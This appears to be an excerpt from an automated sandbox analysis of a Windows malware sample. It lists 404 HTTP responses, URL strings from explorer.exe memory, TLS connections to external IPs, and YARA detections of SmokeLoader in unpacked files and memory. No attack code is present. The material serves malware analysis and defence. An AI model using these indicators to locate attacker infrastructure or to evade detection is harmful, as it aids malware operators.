                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:01:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:01:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:01:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:01:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:01:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:01:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:02:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:02:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 13:02:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000002.00000000.2118897600.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118355378.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118873758.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000002.00000000.2121740943.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2121740943.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000002.00000000.2121214816.000000000C549000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000002.00000000.2117666934.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000002.00000000.2116701532.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000002.00000000.2121214816.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                Source: explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50012 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50013 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50017 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50018 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50020 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50021 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50023 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50024 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50026 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50027 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50029 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50030 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 9.2.jtihrdr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.jtihrdr.530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.B9A0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.B9A0.exe.20c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.B9A0.exe.1fa0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.jtihrdr.520e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
